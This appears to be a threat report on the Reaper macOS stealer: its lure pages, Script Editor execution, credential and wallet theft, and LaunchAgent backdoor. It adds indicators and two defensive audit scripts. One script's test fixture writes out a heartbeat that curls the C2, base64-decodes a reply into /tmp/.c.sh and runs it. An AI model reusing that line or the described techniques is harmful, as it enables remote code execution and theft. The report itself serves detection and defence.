Reaper Bypasses Apple Security to Steal macOS Passwords and Hijack Crypto Wallets

Reaper swipes macOS passwords and crypto wallets, backdoors the machine, and pretends to be Apple, Microsoft, and Google in the same attack. Apple shipped an update in March to stop exactly this. Reaper already bypasses it.
Reaper belongs to a malware family called SHub Stealer, active since April 2025. SHub grew out of an earlier macOS stealer called MacSync, which was itself built on a base called Mac.c, first spotted in April 2025. Within months the family turned into a commercial crime service: the people who build and host the infrastructure rent access to operators who run their own campaigns with their own targets and lures. Researchers at Malwarebytes, Jamf, Moonlock, and Microsoft’s Defender Security Research team had already documented earlier variants, but this Reaper build does three things none of the earlier builds could: bypass Apple’s latest Terminal safeguard, install a backdoor that survives reboots, and permanently hijack installed crypto wallet applications without triggering a single security warning.
The attack starts with fake download pages for WeChat and Miro, two apps a lot of people use for messaging and working together. These pages sit on three domains built to look real at first glance:
- qq-0732gwh22[.]com (fake WeChat installer)
- mlcrosoft[.]co[.]com (Microsoft typosquat, replacing the “i” with an “l”)
- mlroweb[.]com (fake Miro site)
When the page loads, hidden JavaScript runs before anything else happens. It collects the visitor’s IP address and location, plus hardware fingerprinting data pulled through WebGL, a browser graphics API that also exposes the GPU model and driver details. It checks for signs of virtual machines, VPN connections, and security tools. If the keyboard layout indicates a Russian locale or one from a neighboring country in the Commonwealth of Independent States, the script sends a cis_blocked signal to its server and stops: the people running this campaign do not want to infect machines in those countries.
The pages also actively block anyone trying to analyze them. Opening developer tools in the browser triggers a continuous freeze that makes stepping through the code nearly impossible. If a researcher gets past that, the page replaces its own content with a Russian message that translates to Access Denied.
Before the fake installer ever runs, the page also scans which browser extensions are installed and sends that list to the operators through a hardcoded Telegram bot. The script looks specifically for 1Password, Bitwarden, LastPass, MetaMask, and Phantom. The operators know what is on the Mac before the target downloads anything.
macOS has a built-in command-line environment called Terminal, a text interface for sending direct instructions to the operating system. Apple’s Tahoe 26.4 update, released in late March, added a warning that appears when someone tries to paste a potentially dangerous command into Terminal, specifically to counter a social engineering technique called ClickFix where attackers trick people into pasting malicious commands themselves. Reaper sidesteps this entirely.
Instead of using Terminal, Reaper opens a different built-in macOS application, Script Editor, Apple’s native tool for writing and running AppleScript. It triggers this through the applescript:// URL scheme, which Script Editor registers so that a link can hand a script straight from a web page to the app. Browsers generally ask for confirmation before handing a link to an external app, so this step still relies on the victim clicking through that prompt. When the victim clicks the fake installer button, the browser opens Script Editor with the malicious code already loaded. The malicious command is buried hundreds of lines below the visible window, beneath ASCII art and filler text, so nothing looks suspicious at first glance.
When the victim clicks “Run” in Script Editor, a message appears claiming to install a security update for XProtectRemediator, a real Apple security component, so the prompt looks like routine system maintenance. Behind that message, curl, a standard command-line download tool, silently fetches the malicious shell script and pipes it into zsh, the default macOS shell. A dialog box then asks for the Mac’s login password. The entered password is captured and immediately verified with dscl . -authonly, a legitimate Directory Service command that reports whether a username and password pair is valid, so a mistyped or deliberately wrong password is not accepted. Only after the password passes that check does Reaper report success to its server and continue.
From that point, Reaper goes through the entire machine. Saved passwords from Chrome, Firefox, Brave, Edge, Opera, Vivaldi, Arc, and Orion are all taken. The macOS Keychain, the place where the Mac stores saved passwords, website logins, and certificates, gets hit too. iCloud data, Telegram sessions, developer config files, and browser extension data all go into the same collection.
Reaper also goes through the Desktop and Documents folders and grabs files with these extensions:
- .docx, .doc, .wallet, .key, .keys, .txt, .rtf, .csv, .xls, .xlsx, .json, .rdp, .pdf, .kdbx, .seed
Two of those deserve a closer look, and both also turn up in related SHub variants. KeePass is a password manager that keeps every saved credential in one encrypted database file with the .kdbx extension; if that database sits on the local machine, Reaper takes it. The file stays encrypted under its master password, so a strong, unique master password is what stands between the operators and its contents. The .seed extension targets cryptocurrency seed phrases, the master recovery words that restore complete control of a wallet from any device. Files under 2MB are taken as-is, and images up to 6MB are included too. When the total collected data exceeds 85MB, Reaper writes a script to /tmp/shub_split.sh that splits the archive into 70MB chunks and uploads them one by one to the C2 server, the remote server the attackers control.
After the initial theft, Reaper looks for 16 desktop crypto wallet applications, including Exodus, Atomic Wallet, Ledger Live, Ledger Wallet, Trezor Suite, Electrum, Coinomi, and Wasabi Wallet. When it finds one, it downloads a modified version of the wallet’s core application file from the C2 server and swaps it in for the legitimate one. Before doing that it runs xattr -cr on the bundle, which strips every extended attribute including com.apple.quarantine, the flag Gatekeeper uses to decide whether a downloaded file needs assessment, and then applies an ad-hoc code signature. Ad-hoc signing attaches no developer certificate and marks nothing as trusted; its purpose is to give the tampered bundle a signature that is internally consistent, because the vendor’s original signature no longer matches the modified file, macOS kills a process whose code signature fails to validate, and on Apple silicon every native executable must carry at least an ad-hoc signature to launch at all. With the quarantine flag gone, Gatekeeper never assesses the replacement. Every future launch of that wallet runs the attacker’s version, and every transaction from that point forward passes through software the operators control.
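One way to audit installed wallets for exactly this tampering, as an added example that is not part of the original article or of any vendor tooling: it classifies the output of Apple’s codesign tool and flags bundles that are unsigned, ad-hoc signed, or fail strict verification. The wallet bundle names, the sample codesign output, and the assumption that a genuine vendor build carries a Developer ID signature are mine.

```bash
#!/bin/bash
# Added example, not code from the page or from the researchers: check installed
# desktop wallets for the replacement pattern described above. Assumptions (mine):
# bundle names under /Applications as listed below; a genuine vendor build carries
# a Developer ID signature and passes `codesign --verify --deep --strict`, so an
# ad-hoc or missing signature, or a failed verification, is treated as suspicious.

# Classify a wallet bundle from the text of `codesign -dvv <bundle>` ($1) and the
# exit status of `codesign --verify --deep --strict <bundle>` ($2, 0 = intact).
# Split from the command invocation so the logic can be exercised on captured
# output. Prints one of: unsigned, adhoc, tampered, developer-id, other.
classify_signature() {
  local dvv="$1" verify_status="$2"
  if printf '%s\n' "$dvv" | grep -q 'code object is not signed at all'; then
    echo unsigned
  elif printf '%s\n' "$dvv" | grep -q '^Signature=adhoc'; then
    echo adhoc                       # what `codesign -s -` leaves behind
  elif [ "$verify_status" -ne 0 ]; then
    echo tampered                    # signed, but bundle contents no longer match
  elif printf '%s\n' "$dvv" | grep -q '^Authority=Developer ID Application'; then
    echo developer-id
  else
    echo other
  fi
}

# Verdicts that mean "reinstall from the vendor and treat the wallet as compromised".
is_suspicious() {
  case "$1" in
    unsigned|adhoc|tampered) return 0 ;;
    *) return 1 ;;
  esac
}

# Live audit of this Mac. Bundle names are assumed; edit to match what is installed.
audit_wallets() {
  printf '%s\n' 'Exodus.app' 'Atomic Wallet.app' 'Ledger Live.app' 'Trezor Suite.app' \
    'Electrum.app' 'Coinomi.app' 'Wasabi Wallet.app' |
  while IFS= read -r app; do
    bundle="/Applications/$app"
    [ -d "$bundle" ] || continue
    dvv=$(codesign -dvv "$bundle" 2>&1)            # codesign writes details to stderr
    if codesign --verify --deep --strict "$bundle" >/dev/null 2>&1; then status=0; else status=1; fi
    verdict=$(classify_signature "$dvv" "$status")
    if is_suspicious "$verdict"; then
      echo "ALERT  $app: $verdict signature"
    else
      echo "ok     $app: $verdict"
    fi
    # A missing com.apple.quarantine attribute is not evidence by itself: apps
    # installed from a .dmg or .pkg often never carried it. The signature is the signal.
  done
}

# Constructed sample of `codesign -dvv` output for an ad-hoc re-signed bundle (not
# captured from a real infected machine), so the classifier can run offline.
SAMPLE_ADHOC='Executable=/Applications/Example.app/Contents/MacOS/Example
Identifier=com.example.wallet
Format=app bundle with Mach-O thin (arm64)
CodeDirectory v=20400 size=1860 flags=0x2(adhoc) hashes=49+7 location=embedded
Signature=adhoc
Info.plist entries=26
Sealed Resources version=2 rules=13 files=120'

demo() { classify_signature "$SAMPLE_ADHOC" 0; }   # prints: adhoc

if [ "${1:-}" = "--live" ]; then audit_wallets; else demo; fi
```

Run it with --live on the Mac under investigation; without arguments it only classifies the constructed sample. An ad-hoc verdict on a wallet that the vendor ships with a Developer ID signature is the fingerprint of the swap described above, and the only sane response is to reinstall from the vendor and move the funds.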
Before finishing, Reaper installs a backdoor. It creates a directory whose name mimics the one Google uses for its automatic updates (the GoogleUpdate directory referred to in the cleanup steps below) and keeps it alive with a LaunchAgent. A LaunchAgent is a property-list file that tells launchd, the macOS service manager, to start a program for the logged-in user and, optionally, rerun it on a schedule. This one is named com.google.keystone.agent.plist, identical to the name Google’s real update agent uses. Every 60 seconds the script it launches contacts the C2 server at hebsbsbzjsjshduxbs[.]xyz/api/bot/heartbeat and sends system information. If the server answers with instructions wrapped in Base64, a standard encoding that lets arbitrary bytes travel cleanly over a network, the script decodes them, writes the result to a hidden file at /tmp/.c.sh, executes it with the current user’s privileges, and immediately deletes the file, so the executed command leaves no permanent trace on disk. The operators can push any instruction to every infected Mac at any time, including more malware or further data collection.
Microsoft’s Defender Security Research team found three versions of this same SHub campaign running between January and April 2026, with more than 60 domains used to deliver the malware in just one of them. The malware spread through Squarespace pages, a note-taking platform called Craft, and fake troubleshooting posts published to Medium. One of those fake pages was claudecodedoc[.]squarespace[.]com, impersonating Claude Code documentation: the same family behind Reaper used an AI coding tool as a lure.
Some versions of the SHub campaign use a Telegram bot as a backup communication channel. If all the main servers go offline, the malware fetches a fresh server address directly from a public Telegram bot page. That makes the whole infrastructure much harder to shut down permanently.
In cybersecurity, attribution is one of the hardest problems to solve reliably. Infrastructure can be rented or proxied, tools are shared and resold between groups, and coding style in malware can be deliberately misleading. What researchers can confirm is that every version of this campaign skips the same countries, tracks each victim with a unique ID, and runs on infrastructure that has been growing and improving for at least two years. Who is behind it remains an open question.
ClickFix-style attacks, the delivery category Reaper’s campaign belongs to, increased 517% in 2025 according to ESET. Moonlock Lab tracked a 67% increase in macOS backdoor variants and a 17% increase in stealer variants over the same year. macOS is not the safe platform it was once assumed to be.
What to check and what to do
To check for the backdoor, open Terminal and look for the fake GoogleUpdate directory. If it exists and Google Chrome is not installed on the machine, that is a serious red flag. Then list the user’s LaunchAgents folder (~/Library/LaunchAgents). If com.google.keystone.agent.plist appears there without any Google software installed, unload it, remove the file, and delete the associated GoogleUpdate directory. Google’s real Keystone agent is installed alongside Chrome and other Google apps, so on a Mac that has never had one there is no legitimate reason for that name to exist.
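A triage script for the persistence and check steps above (the LaunchAgent named after Google’s Keystone, the GoogleUpdate directory, and the heartbeat that decodes Base64 into /tmp/.c.sh), added here as an example and not taken from the article, SentinelOne, or Microsoft. It assumes the agent lives in ~/Library/LaunchAgents, approximates “Google software installed” by the presence of Google Chrome.app or Google’s real Keystone directory, and builds a constructed fixture (with an assumed GoogleUpdate path and a stand-in heartbeat script) so it can be exercised offline; the hypothetical paths are labelled in the comments.

```bash
#!/bin/bash
# Added triage script, not code from the page or from the SentinelOne/Microsoft
# write-ups. Assumptions (mine): the fake agent is loaded from ~/Library/LaunchAgents,
# the per-user location launchd reads without admin rights; "Google software
# installed" is approximated by Google Chrome.app or Google's real Keystone directory
# under ~/Library/Google; the heartbeat script is recognised by the C2 domain and by
# the base64-decode-into-a-hidden-/tmp-file pattern described in the write-up.

C2_DOMAIN='hebsbsbzjsjshduxbs.xyz'
FAKE_AGENT='com.google.keystone.agent.plist'

# $1 = home dir, $2 = applications dir. Parameterised so the same checks run
# against a mounted disk image or a test fixture instead of the live machine.
google_software_present() {
  [ -d "$2/Google Chrome.app" ] && return 0
  [ -d "$1/Library/Google/GoogleSoftwareUpdate" ] && return 0
  return 1
}

# Does a file carry the C2 domain or the heartbeat's decode-execute-delete pattern?
has_heartbeat_pattern() {
  grep -q "$C2_DOMAIN" "$1" 2>/dev/null && return 0
  grep -Eq 'base64 +(-d|-D|--decode)' "$1" 2>/dev/null && grep -q '/tmp/\.' "$1" && return 0
  return 1
}

# Inspect one LaunchAgent plist and every existing file it references by absolute
# path (paths containing spaces are not followed). Findings go to stderr; returns 0
# when something is suspicious.
inspect_agent() {
  local plist="$1" home="$2" apps="$3" hit=1 ref
  if [ "$(basename "$plist")" = "$FAKE_AGENT" ] && ! google_software_present "$home" "$apps"; then
    echo "SUSPICIOUS $plist: Keystone agent name with no Google software installed" >&2
    hit=0
  fi
  if has_heartbeat_pattern "$plist"; then
    echo "SUSPICIOUS $plist: plist itself contains the C2 domain or the heartbeat pattern" >&2
    hit=0
  fi
  for ref in $(grep -Eo '/[^<>"[:space:]]+' "$plist" || true); do
    if [ -f "$ref" ] && has_heartbeat_pattern "$ref"; then
      echo "SUSPICIOUS $plist: launches $ref, which beacons to the C2 or decodes base64 into /tmp" >&2
      hit=0
    fi
  done
  return $hit
}

# Count suspicious agents under $1/Library/LaunchAgents ($2 = applications dir).
count_suspicious_agents() {
  local dir="$1/Library/LaunchAgents" n=0 p
  for p in "$dir"/*.plist; do
    [ -f "$p" ] || continue
    if inspect_agent "$p" "$1" "$2"; then n=$((n + 1)); fi
  done
  echo "$n"
}

# Constructed fixture, not a real sample: a home directory with the fake agent, a
# stand-in heartbeat script at an ASSUMED GoogleUpdate location (the real path is
# not reproduced in the write-up), a benign agent, and no Google software.
make_sample_fixture() {
  local root="$1"
  mkdir -p "$root/home/Library/LaunchAgents" "$root/home/Library/GoogleUpdate" "$root/apps"
  cat > "$root/home/Library/GoogleUpdate/update.sh" <<'EOF'
#!/bin/zsh
resp=$(curl -s https://hebsbsbzjsjshduxbs.xyz/api/bot/heartbeat)
[ -n "$resp" ] && printf '%s' "$resp" | base64 -d > /tmp/.c.sh && zsh /tmp/.c.sh; rm -f /tmp/.c.sh
EOF
  cat > "$root/home/Library/LaunchAgents/$FAKE_AGENT" <<EOF
<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0"><dict>
<key>Label</key><string>com.google.keystone.agent</string>
<key>ProgramArguments</key><array><string>/bin/zsh</string><string>$root/home/Library/GoogleUpdate/update.sh</string></array>
<key>StartInterval</key><integer>60</integer>
</dict></plist>
EOF
  cat > "$root/home/Library/LaunchAgents/com.example.benign.plist" <<'EOF'
<plist version="1.0"><dict><key>Label</key><string>com.example.benign</string>
<key>ProgramArguments</key><array><string>/usr/bin/true</string></array></dict></plist>
EOF
}

demo() {
  local root; root=$(mktemp -d)
  make_sample_fixture "$root"
  echo "suspicious agents in fixture: $(count_suspicious_agents "$root/home" "$root/apps")"
  rm -rf "$root"
}

case "${1:-}" in
  --live) count_suspicious_agents "$HOME" /Applications ;;
  *) demo ;;
esac
```

Run it with --live to walk the current user’s LaunchAgents; without arguments it builds the fixture in a temporary directory, reports one suspicious agent, and cleans up. The name check alone is weak (a Mac that once had Chrome legitimately carries that plist), which is why the script also follows each ProgramArguments path and looks for the beacon pattern rather than trusting the file name in either direction.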
Block this C2 domain at the network or DNS level:
- hebsbsbzjsjshduxbs[.]xyz
SentinelOne published the following identifiers for detecting Reaper:
- Build name: Reaper
- Build hash: c917fcf8314228862571f80c9e4a871e
- Build ID: 6552824c59ddacb134073f24a4bd4724514a938a9dc59f1733503642faed3bd3
Do not visit or download from these fake sites:
- qq-0732gwh22[.]com
- mlcrosoft[.]co[.]com
- mlroweb[.]com
If a Mac has been infected, every password and credential on that machine should be changed from a separate, clean device. Any crypto wallet that was installed at the time of infection should be considered compromised, even if the wallet app looked normal afterward, and so should its seed phrase, since a stolen seed restores the wallet anywhere. Do not reuse that seed: generate a new wallet with a fresh seed phrase on a device that was never on the same network, and sweep the funds into it.
macOS does not deliver security updates through browser-triggered scripts. Apple does not ask anyone to open Script Editor and click “Run” to install anything. If a website opens Script Editor or asks to run any script, close the browser.
The attack chain Reaper uses runs straight through topics the course covers: building convincing fake sites and spoofing domains, running malicious commands through trusted system tools that security software rarely questions, stealing credentials, and staying hidden after the initial compromise. If understanding how attackers pull this off is what you are after, that is where to start.
Hacking is not a hobby but a way of life. 🎯
Sources: SentinelOne | Microsoft Security Blog